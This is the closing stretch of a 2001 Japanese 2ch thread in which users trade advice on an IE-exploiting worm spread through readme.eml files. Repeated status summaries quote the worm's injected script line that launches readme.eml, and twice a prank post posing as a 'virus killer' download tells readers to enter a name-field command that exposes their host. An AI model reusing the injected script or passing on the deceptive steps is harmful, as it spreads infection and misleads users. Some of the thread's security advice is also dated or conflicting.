それ以前だとそれすら出てこないので問題なのです、、、
869ななし:01/09/19 22:36 ID:HqLwJMxQ
IEはウィルスだと聞いたことがあります。
IEのインストール方法をネットに記述することは犯罪ではないのですか?
870 :01/09/19 22:37 ID:TbNi7sXg
>863
CDからだと大丈夫なこともあるんですか?
871@@:01/09/19 22:38 ID:PL8pJIzE
すまぬが誰か今までのベストの対処方法をまとめていただけませんか?
テレ穂タイムまでじかんがないので!
お願いします!
全部読んでいる暇がありませんです(泣
872nanao:01/09/19 22:38 ID:cuInItTs
今手元にそのウィルスがあるのですが、
テキストにしてここに貼ったらダメですよね?

MSN以外を見てて、感染しそうになったのは
漏れだけなんですか?
873 :01/09/19 22:39 ID:qcJ.YKJs
v5.5用sp2・・・8Mダウンロードに3分だった。ADSLのヨサを初めて実感・・・
874 :01/09/19 22:40 ID:4YJKdDT.
何度もすみません
ここの左上のお取引メニュー(ログイン)なんですが・・・
  ↓
http://www.japannetbank.co.jp/

昨日まではクリックすると普通にウインドウが開いたんですが・・・
875nanasisan:01/09/19 22:40 ID:VCih6ARI
>>871
(1) IEのバージョンアップ
(2) 全てのファイルに対してウイルススキャン
(3) 心配ならスクリプトまわりをOFF
876 :01/09/19 22:40 ID:cuInItTs
>>865のURL行ったら感染するYO!
877  :01/09/19 22:40 ID:kCJe70A6
             /■■■■■\
           /  ■■■■■ .\
          /   ■■■■■   .\
        /     ■■■■■    .\_
       .r'゙                   i゙''
       l         __           i
       l     :,,r''' ̄ ゙゙゙゙゙̄''''''''''''-,,_    i
       i   ;ri!゙            ゙lll;;,  i
        '|  ;lll|l ,,,,:;iiii;,,,,   ,,,;;lllii;_  'll|l  |
        .'l, レll'l '''  ,,,,, ̄    ,,,,,___   l|ト,r
        '|;i|'ト  :r:'llll''     ゙゙'ill⌒  l ゙.r'''
        .l ゙ト               i .|
         'l .|  :r'゙ /'    ! \   l |      _______
         .ll,,) '|!,,,  .(i;;;;;iiilllii;il)l;':: ,r''| li,,,l     /
           |l;,'l||ll!|lll'llllllllllllllllll,'! ||l| ll |!゙    < おにぎりワショーイ!
           | i‐:リlト:,::;;;;;;;;;;;;;;,,,:l lil ´l!|.;|l゙     \     by ラディソ
            '!:ト)' 'li, iiiiiiiiiiiii'.、l.`ll,,|:(` |         ̄ ̄ ̄ ̄ ̄ ̄ ̄
            l|!`r,.('ト.r i l゙ i  |. )゙l! |
            i'!.'il、.'l; .| i'l l. ; l,i,'!!'l;゙;; '|゙
            ゙ 'l;;;l'llll :ili;|.フ/; ,`ト.゙;l!.
             ;l i;''ll!|_ |_ li,, !,,l'!.lレi!ト
             ト .l|l、.lli;l!i'''!,、 r l!(./
             ゙' '!゙゙ llレ|l,.;i,i;| ;ー.゙
                 ゙liト !:!
878 :01/09/19 22:41 ID:d3VTxE7E
>>868
ど〜も。
「ダウンロードしますか?」が出てくる前にノートン先生が反応しまくってビックリしましたよ。
879  :01/09/19 22:41 ID:xrrEreS.
時間がない奴、分からん奴、ネタじゃなくネスケを入れとけ。
880nanasisan:01/09/19 22:42 ID:VCih6ARI
>>874
httpsのproxyを設定してるか、https自体無効にしてない?
一度設定回りを確認し直した方がよい。
881 :01/09/19 22:42 ID:LjR.bp4A
IE5.5SP2にしたしJavaScriptも切ってあるけど、>>865
行く勇気がない・・・・
でも、行ってみたい・・・・
882ういるす:01/09/19 22:43 ID:k3oIsIQw
ウィルス対策ソフトなんて、ヘビーユーザーしか
入れてない気がする。そんなことないすかねぇ?
883 :01/09/19 22:44 ID:ALUfLgrg
逆に最近はヘビーユーザじゃなくてもネットやったりしてるしね。
884        :01/09/19 22:44 ID:P53JBYco
>>871
ここもよくまとまってると思う。
ttp://staff.aist.go.jp/takagi.hiromitsu/intra/security/alert/20010919-1.html
■最悪のウイルス登場MSNが配布 その3■の76さん、感謝。
885 :01/09/19 22:45 ID:dw2qn0j.
>882
出掛ける時も家に鍵をかけない田舎の人間みたいなこというなよ。
886ぺ ◆lPYiMAEY :01/09/19 22:46 ID:1xVp6UNk
>882
あまい
887定期コピ:01/09/19 22:46 ID:LNEMDmj.
状況報告ver1.05(前編)
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
 →java関連とダウンロードのファイルのダウンロードを不許可。

現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。

メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。

LANによる感染
 社内に一人でも対策してないひとがいてノーパスとかにしていた場合
 LANの共有フォルダを使っても自己増殖する。

感染鯖
 ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
が追加される。
888名無しさん:01/09/19 22:47 ID:lVEmuQHY
MSNウイルスから完全にCPUを守るソフトをダウンロードできるサイトがあります。
ただし特殊なソフトにつき普通にリンクを張ることはできません。

ダウンロードの方法は
1.書き込みの名前の欄に http://fusianasan.2ch.net/ と入れる。(裏ドメイン名)
2.E-mail欄に、msn virus killerと入力する。(ログオン)
3.本文に「ウイルス 逝ってよし」を入れて(パスワード)、書込みボタンを押します。
4.タイトルが「ウイルスバスターダウンロード」に変わればOK!
5.サーバーが重いと2chに戻ってくるけど、くじけずに何度も挑戦!

  うまく行くと、目的のページにつながります。
6.家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
  都合上つながる確立が高いです。

 (注意!)全て半角で入れること!!
       23:00〜03:00の間はつながり難いです!何度もトライ!
       http://fusianasan.2ch.net/←は、裏ドメインの為「直リン」で飛んでも
       「鯖が見つかりません」になります。入り口は「表2ch」のCGIだけです。

 
889 :01/09/19 22:47 ID:cuInItTs
http://www.backweb.co.jp/
もやられてます。
890定期コピ2:01/09/19 22:47 ID:LNEMDmj.
状況報告ver1.05(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
 *.emlが大量にHITした際は確定。
 ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
 そうでないときは後者2個を削除して様子を見る。
 といっても後者二つを消したからウイルスが消えるわけではない。
 ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)


感染時の対応
 感染してしまった後は、アップデートしても無意味。
 とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。

 感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除

 ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
891nanasisan:01/09/19 22:48 ID:VCih6ARI
>>888は嘘です。信じてはいけません :-)
ホスト名が晒されてしまいます。
892 :01/09/19 22:48 ID:fE4h2VAs
プロバイダが無料で配布しているCDに入っている
インターネットエクスプローラーはSP2なんでしょうか?
893 :01/09/19 22:48 ID:XTAHDm5.
>>888

なんかこーゆーの久しぶりに見たよ。
894nanasisan:01/09/19 22:49 ID:VCih6ARI
>>892
それはプロバイダにもよるし、配布時期にもよります。
CD-ROMのどこかにドキュメントがあると思うので、それを参照しましょう。
895 :01/09/19 22:53 ID:d/7aZE/g
なつかしいな、おい。>>888
896 :01/09/19 22:54 ID:fE4h2VAs
>>892
ありがとうございます。

雑誌に付録されているCDでSP2のバージョンが入っている
ものはないんでしょうか?
友人がみんなダイヤルアップ接続のため、Windowsupdateは
使えそうにないのです。
897 :01/09/19 22:54 ID:gxgcJyr2
セキュリティ問題の修正プログラム ってのはダウンロードしなきゃならないん
ですかね。当方IE5.5SP2をインストしたばかりです。
898名無しさん23:01/09/19 22:55 ID:nOf06Vs2
>>884
IE6(正式版)はどうなの?
899 :01/09/19 22:56 ID:KpBT27lU
>>897
やるべきだ。
900ういるす:01/09/19 22:57 ID:k3oIsIQw
スーパー初心者さんたちは、
ヘブライ語サポート、
アラビア語サポートなんかも、勢いで落としそうな予感
901ぺ ◆lPYiMAEY :01/09/19 22:57 ID:1xVp6UNk
CD-ROMが欲しいという人は、明日まで待たなくても
今すぐにコンビニに逝けばいいんじゃないかい?

最近はどこでもパソコン関係の雑誌がおいてあるし、
添付のCD-ROMにSP2が入っているのもあると思われ。
902nanasisan:01/09/19 22:57 ID:VCih6ARI
>>897
入れた方がよいです。はい。

>>896
店頭で探してみることをお勧めします。そんなに苦労なく見つけられると
思いますので。。。
903 :01/09/19 22:57 ID:LjR.bp4A
Internet Explorer 5.5 Service Pack 2

http://www.microsoft.com/downloads/release.asp?releaseid=32082
ダウンロードに1時間前後かかります。
テレホはもっとかかるかな?
904nanasin:01/09/19 22:57 ID:5ulH0vA6
感染してからバックアップとったんですけど
そのバックアップとったCD見てみたら例のdesktop.emlファイルが各フォルダ毎に1個ずつ入ってました。
これは他のファイルにも感染してて、
違うマシンでこのCDに入ってるファイルを使ったら感染してしまうってことなんでしょうか?
905 :01/09/19 22:57 ID:dIGqV/Eg
今日IE5.5SP2をインストールしたんだけど
KERNELエラーが出まくりで何度再起動してることか・・・
これってインストールの失敗?ウィルス?
906 :01/09/19 22:58 ID:j/NE2af2
>>865
リンク先からreadme.emlを入手できました。
ありがとう。
907897:01/09/19 22:59 ID:gxgcJyr2
>>899
>>902
レスありがとうございます。しかし無茶苦茶重いですね。
で、DL残りあと数KBから動かないんですけど・・・。
待つしかないんでしょうか。
908nanasisan:01/09/19 22:59 ID:VCih6ARI
>>904
おそらくはその通り。本当に必要のあるファイル(できれば.jpgとか.gifとか
.txtとかのようにマクロやスクリプトが埋め込まれないものが良い)だけを
バックアップしたほうがよいとおもう。
909_:01/09/19 22:59 ID:T.W/lyRg
>>878
おれも見に行ったけど突然ノートン君のレッド画面が!!
ちなみにIE5.5SP2。その後ダウンロードの画面が出たので「キャンセル」。
ブラクラよりたち悪い。おもしろ半分で見に行くのはダメダメ!!
910ぺ ◆lPYiMAEY :01/09/19 23:01 ID:1xVp6UNk
>897
すでにSP2にアップデートしてるのに、古い「重要な更新」
が表示されるっていうパターンかい?

SP2のリリースは今年の8月、重要な更新は4月頃でしょ?
おかしな話だよね。
だから漏れはその更新のアップデートは推奨しない。
911 :01/09/19 23:01 ID:fE4h2VAs
>>901 >>902
了解です。
ありがとうございました。
912 :01/09/19 23:01 ID:BOsPTvFw
MSNってなんて読むの?
そのまま? 
913  :01/09/19 23:03 ID:fCT4aGVk
財務省もかよ!!!
914これは?:01/09/19 23:05 ID:40eT3zvM
件名:README
本文:Hi! How are you?
I send you this file in order to have your advice
See you later. Thanks
添付ファイル:README.doc.com、ATT00070.txt
こんなのがメールに来たけどこれもこの関係のウィルス?┐('〜`;)┌
915名無しなのか?:01/09/19 23:09 ID:qoiB.8o2
>>914
別件と思われ。まず間違いなくウイルスでしょ。
916nanasisan:01/09/19 23:09 ID:VCih6ARI
>>910
IE5.5の開発プロジェクトと5.0のパッチの開発プロジェクトが別々だっていう
こともある(UNIX系では「ブランチ」といったりする)ので、適用したほうが
間違いないかと。
917       :01/09/19 23:09 ID:P53JBYco
>>897
>>910
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
これのことですか?
これならば5.01も5.5もSP2に含まれてますので不要と思います。
それとも別のでしょうか?
918nanasisan:01/09/19 23:10 ID:VCih6ARI
>>912
「えむえすえぬ」で良いはず。"MicroSoft Network" の略。
919nanasin:01/09/19 23:10 ID:5ulH0vA6
>>908
やっぱりそうなんですか・・・
どうしよう・・・
920  :01/09/19 23:11 ID:LEiRPEVk
ブラウザの立ち上げに異常なほど時間がかかるんですが、ヤバイですか?
修正ファイル落とすのすら満足にできない。
921にゃごにゃご ◆SiztG/RU :01/09/19 23:11 ID:qasMGDqo
nanasisanの献身的レス、感動!
922名無しなのか?:01/09/19 23:12 ID:qoiB.8o2
>>921
 同意!ほんと、すばらしいですね。尊敬します!

がんばれ!nanasisan!
923     :01/09/19 23:12 ID:P53JBYco
nanasisan、ありがとうございます!

だれかパート2たててください
924nanasisan:01/09/19 23:14 ID:VCih6ARI
>>919
とりあえずCD-ROM(CD-Rかな?)に対して全部のファイルをウイルスチェック。
もちろん最新のパターンファイルで。
引っかからないようなら安心して良い。
925  :01/09/19 23:14 ID:fCT4aGVk
パート2いるの?過去ログ読めば十分じゃん。
甘えすぎ。甘えすぎ。甘えすぎ。
926nanasisan:01/09/19 23:16 ID:VCih6ARI
>>925
いちおう立てておいた方が「IEで感染してしまいました」スレが乱立しかねない
状況を考えれば良い考えかと。
927 :01/09/19 23:16 ID:.xFBTiXw
>>925
いいこというね
928名無しさん:01/09/19 23:16 ID:lVEmuQHY
MSNウイルスから完全にCPUを守るソフトをダウンロードできるサイトがあります。
ただし特殊なソフトにつき普通にリンクを張ることはできません。

ダウンロードの方法は
1.書き込みの名前の欄に http://fusianasan.2ch.net/ と入れる。(裏ドメイン名)
2.E-mail欄に、msn virus killerと入力する。(ログオン)
3.本文に「ウイルス 逝ってよし」を入れて(パスワード)、書込みボタンを押します。
4.タイトルが「ウイルスバスターダウンロード」に変わればOK!
5.サーバーが重いと2chに戻ってくるけど、くじけずに何度も挑戦!

  うまく行くと、目的のページにつながります。
6.家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
  都合上つながる確立が高いです。

 (注意!)全て半角で入れること!!
       23:00〜03:00の間はつながり難いです!何度もトライ!
       http://fusianasan.2ch.net/←は、裏ドメインの為「直リン」で飛んでも
       「鯖が見つかりません」になります。入り口は「表2ch」のCGIだけです。
929ばぼ:01/09/19 23:17 ID:hWh68ZQA
MSXでよかったヽ(´ー`)ノ
930nanasisan:01/09/19 23:17 ID:VCih6ARI
>>928
しつこいのぉ。fusianasanじゃホスト名が晒されてしまうぞ・・
931いつかの510:01/09/19 23:17 ID:Ouhz3Z.c
nanasisan!ずうっと寝てないよねやっぱ?
しかも、このレスの多さ。スゲェヨYO!!
932 :01/09/19 23:17 ID:LNnu/xFs
ワクチンソフトって、CPUの石を守るのか(ワラ
だいたい、特殊だから普通にリンクをはれないって、
リファラがあるとはじくのか。
しかもパスワードが全角文字かよ…。
933 :01/09/19 23:18 ID:gSG9bUGY
ダウンロードはじめたはいいんだけど残り24秒になってから既に2時間が経過。
どうなってんだ?
934nanasisan:01/09/19 23:18 ID:VCih6ARI
>>931
そろそろ寝たい・・
935 :01/09/19 23:18 ID:LreNpxz2
マイクロソフトのサイトが非常に重い。
2chで宣伝すると、DDoS攻撃に匹敵する破壊力になってしまうよ。
936何で北アメリカからなんでしょ:01/09/19 23:18 ID:tlvXW9jc
おっさんは明日以降にするわ。DL。
937 :01/09/19 23:18 ID:aOohb38.
>>929
確かにMSXには感染しないね
最強のMS製品じゃない?
938初心者:01/09/19 23:19 ID:Gad5gis6
ログを拾い読みしただけなので、既出かもしれないけれど・・
SP2を入れてから、O.Eの画面が消えてしまいました。
O.Eも何かしないといけないのでしょうか?
ちなみに、ツールバーは生きてます
939いつかの510:01/09/19 23:20 ID:Ouhz3Z.c
>>914
遅くなったけど、それSircamだね。
http://www.ipa.go.jp/security/topics/sircam.html
とかを参考にしたら良いよ。
940nanasisan:01/09/19 23:20 ID:VCih6ARI
申し訳ない。そろそろ寝ることにするよ・・・
きっと深夜は深夜で別の方が助けてくれるだろうことを信じつつ・・・。
941FBI:01/09/19 23:21 ID:LGJz.nhI

              _人
           ノ⌒ 丿
        _/   ::(
       /     :::::::\
       (     :::::::;;;;;;;)_
       \_―― ̄ ̄::::::::::\         1000狙います!!
   \  ノ ̄     ::::::::::::::::::::::)  /
     \(     ::::::::::::::;;;;;;;;;;;;人/
     / ̄――――― ̄ ̄::::::::\
    (    ● \__/::●:::::::::::::)
     .\__::::::::::\/;;;;;;;;;;;;;;;;;;;;;;ノ
942いつかの510:01/09/19 23:22 ID:Ouhz3Z.c
>>934
寝てもいいじゃない?
ほぼネタはがいしゅつでしょ。
そこまで、厨房に付き合わなくといいと思うよ。
943  :01/09/19 23:23 ID:8.qwgzrY
ふ〜〜〜〜。
やっと全部読み終わったYO!
感染してなかったYO!
心配な奴はとりあえず全部読め!!

>nanasisan
ほんとにありがとうございます!!!!
944 :01/09/19 23:23 ID:0M9tObJg
nanasisanさん、ありがとうございました。

今日はお疲れ様でした。ごゆっくりお休みください。
945初心者:01/09/19 23:23 ID:z1v8RI5o
nanasisanお疲れでした。
助かりました。
946いつかの510:01/09/19 23:23 ID:Ouhz3Z.c
>>940
おやすみです。
947 :01/09/19 23:24 ID:ZaN1BBPg
この時期、半角板に逝くのは
タイに行く位危ないでしょうか?
948じゃ、1000取り前に:01/09/19 23:25 ID:yZ87i7kI
状況報告ver1.06(前編)
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
 →java関連とダウンロードのファイルのダウンロードを不許可。
 ダウンロードの不許可は保険の保険なので、必要ない人には必要なし。

現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。

メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。

LANによる感染
 社内に一人でも対策してないひとがいてノーパスとかにしていた場合
 LANの共有フォルダを使っても自己増殖する。

感染鯖
 ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
が追加される。
949:01/09/19 23:25 ID:BYEyAkxw
950名無しなのか?:01/09/19 23:25 ID:qoiB.8o2
>>947
 いや、アフガンだろ
951 :01/09/19 23:26 ID:UKoXFWhc
今までFW(含PFW)も導入せず、ウイルス対策もしてなかったような
やつらが何を今になって慌ててるんだか・・・・
952続き:01/09/19 23:26 ID:yZ87i7kI
状況報告ver1.06(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
 *.emlが大量にHITした際は確定。
 ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
 そうでないときは後者2個を削除して様子を見る。
 といっても後者二つを消したからウイルスが消えるわけではない。
 ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)


感染時の対応
 感染してしまった後は、アップデートしても無意味。
 とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。
 むしろ自他の被害の拡大を考えるならOS(又は感染以前のバックアップ)から
入れ直した方がいい。

 感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除

 ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
953 :01/09/19 23:29 ID:7112tIoU
>>934
今日はありがとう。
ゆっくり風呂でも入って、マターリしておくれ。
954いつかの510:01/09/19 23:30 ID:Ouhz3Z.c
>>952
おつかれ
955 :01/09/19 23:30 ID:Yk2xVFfU
次スレはセキュリティ板に立ててちょ
956 :01/09/19 23:37 ID:lbUDqEKw
>>955
速報板の方がイイ
957 :01/09/19 23:38 ID:VcTe.kz2
速報板にしてはこのスレあんまりもりあがってないね。
958ぺ ◆lPYiMAEY :01/09/19 23:41 ID:Q.NJAFY.
>957
スレが2つあるからね
959   :01/09/19 23:43 ID:hZNQf5DU
>>912
結〜んで〜ひ〜ら〜い〜て〜
960 :01/09/19 23:45 ID:ALUfLgrg
TBSでもやってる。
961 :01/09/19 23:45 ID:IcqskS1s
サイバーテロ…
962 :01/09/19 23:49 ID:NqqLTk9.
963http:// x210-231-124-42.mmtr.or.jp.2ch.net:01/09/19 23:49 ID:PrA2N6fI
>>928 逝ってよし
964名無し:01/09/19 23:49 ID:7nIc7.2w
そろそろ加速?
965 :01/09/19 23:50 ID:y/D0.fMk
2ちゃんに引きこもるか・・・
966  :01/09/19 23:51 ID:ezY2nkUk
俺はもうやられたよ。
鬱だ氏脳
967 :01/09/19 23:51 ID:mxUXkeNs
今コンビニでワクチンソフト売ってないよね??以前はあったんだが。
968名無し:01/09/19 23:52 ID:7nIc7.2w
1000はまだか?
969 :01/09/19 23:52 ID:nnJckqEA
IE5.5をWindowsUpdateでインストールしようとしたんですが
標準インストールじゃなければまずいでしょうか?
プラウザだけでは駄目?
970名無し:01/09/19 23:53 ID:7nIc7.2w
1000!
971 :01/09/19 23:53 ID:mxUXkeNs
しかし シマンテックもうすぐ安置ウイルス2002がでるんだが2001買いたく無い
972名無し:01/09/19 23:54 ID:s6wPAmQY
見て感染は防げそうだけど
添付メールのほうは防げないの?
973 :01/09/19 23:54 ID:cfhptFno
readme.exeを含まれる文字列で検索したら5つあったけど、
やばいの?
974:01/09/19 23:54 ID:8uX9itlo
1000う
9751000:01/09/19 23:55 ID:FJzCY.Kw
1000
976 :01/09/19 23:56 ID:6VlhIkQw
>>973
やばいよ
977 :01/09/19 23:57 ID:q6umiJv.
>>973
名前のほうで再チェック
978 :01/09/19 23:57 ID:80QZytcs
ブラウザで速報板を見たら、ウイルスへの警告文があった。
なんかこわー
979  :01/09/19 23:58 ID:qcdjllZw
よいよい
980 :01/09/19 23:59 ID:/pckEwmQ
     / ) / ̄ ̄ ̄ ̄ ̄ ̄ ̄
            ./ / |  1000!!
           / /  \          / ̄ ̄ ̄
           / /     ̄|/ ̄ ̄ ̄ ̄|   マンセー
         ./Λ_Λ    , -つ     \          /
         /<丶`∀´>  ./__ノ        ̄∨ ̄ ̄ ̄ ̄
        /    \ / /   ⊂_ヽ、
        .|    へ/ /      .\\  Λ_Λ   
        |    レ'  /、二つ       \ ( ´Д`)
        |     /            >  ⌒ヽ
       /   /             /    へ \
       /  /              /    /   \\
      /  /               レ  ノ     ヽ_つ
     / ノ                /  /
   _/ /                /  /|
  ノ /                  ( ( 、
⊂ -'                    |  |、 \
                       | / \ ⌒l
                       | |   ) /
                      ノ  )   し'
                     (_/   
981damian:01/09/20 00:01 ID:VwMHbb0I
オイラのばあい・・・トレンドマイクロでスキャンしたけど
何一つウイルスは引っかかってなかった。
982   :01/09/20 00:02 ID:gwKdyKJA
次スレ
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667

このスレを読んでなお分からない事を聞くように。
教える方はボランティアです。
お礼もいいがムダにログを増やすので心の中でお礼を言うので十分です。
983名無し:01/09/20 00:02 ID:y8aIBcz.
このスレ980超えても、緩やかな伸び方・・・。

最近にしては異常だ(w
984 :01/09/20 00:04 ID:ZfLWYKNQ
             / ) / ̄ ̄ ̄ ̄ ̄ ̄ ̄
            ./ / |  飛び出せ!!
           / /  \          / ̄ ̄ ̄ ̄ ̄ ̄
           / /     ̄|/ ̄ ̄ ̄ ̄|  1000!!
         ./∧_∧    , -つ    \
         /<丶`∀´>  ./__ノ        ̄∨ ̄ ̄ ̄ ̄
        /    \ / /   ⊂_ヽ、
        .|    へ/ /      .\\  ∧_∧  
        |    レ'  /、二つ       \ ( ´Д` )
        |     /            >  ⌒ヽ
       /   /             /    へ \
       /  /              /    /   \\
      /  /               レ  ノ     ヽ_つ
     / ノ                /  /
   _/ /                /  /|
  ノ /                  ( ( 、
⊂ -'                    |  |、 \
                       | / \ ⌒l
                       | |   ) /
                      ノ  )   し'
                     (_/ 
985mm:01/09/20 00:06 ID:jBMmXOIs
1000GET
986 :01/09/20 00:06 ID:H.FOaltM
1000
987中中:01/09/20 00:06 ID:7O6hrMTA
JavaScriptの切り方:
インターネットオプション

セキュリティレベルのカスタマイズ

JavaScriptの無効
ついでにJavaも無効
ダウンロードも無効

こうしておけば、簡単な対策にはなるの?
9881000:01/09/20 00:07 ID:NqmMlkh.
今ここに何人いるのだろう?
なんか ドキドキしてきたYO!
989マターリ:01/09/20 00:07 ID:NfM8xwi6
マターリしててイイ!
9901000:01/09/20 00:08 ID:NfM8xwi6
1000かな?
9911000:01/09/20 00:09 ID:70aubJc6
1000
992mm:01/09/20 00:09 ID:jBMmXOIs
伸びがおそいぞ
そろそろ1000かな
993 :01/09/20 00:09 ID:WfjqE8/Q
思ったより1000いくのがスローペース(w
994いまだ!!:01/09/20 00:09 ID:NfM8xwi6
1000!!!(w
995 :01/09/20 00:09 ID:wl8noRG.
 | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
 |    1000!    |
 |_________|
    ∧∧ ||
    ( ゚д゚)||
    / づΦ
996100:01/09/20 00:09 ID:qRlfWngU
1000000
9971:01/09/20 00:09 ID:JgOOybW6
11
9981000:01/09/20 00:09 ID:Zoz6/0QU
999FBI:01/09/20 00:10 ID:T69GCN8c

              _人
           ノ⌒ 丿
        _/   ::(
       /     :::::::\
       (     :::::::;;;;;;;)_
       \_―― ̄ ̄::::::::::\         ヤター!!
   \  ノ ̄     ::::::::::::::::::::::)  /
     \(     ::::::::::::::;;;;;;;;;;;;人/
     / ̄――――― ̄ ̄::::::::\
    (    ● \__/::●:::::::::::::)
     .\__::::::::::\/;;;;;;;;;;;;;;;;;;;;;;ノ
1000 :01/09/20 00:10 ID:H.FOaltM
ガ━━(゚Д゚;)━━ン! 1000ジャナイ!!!
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。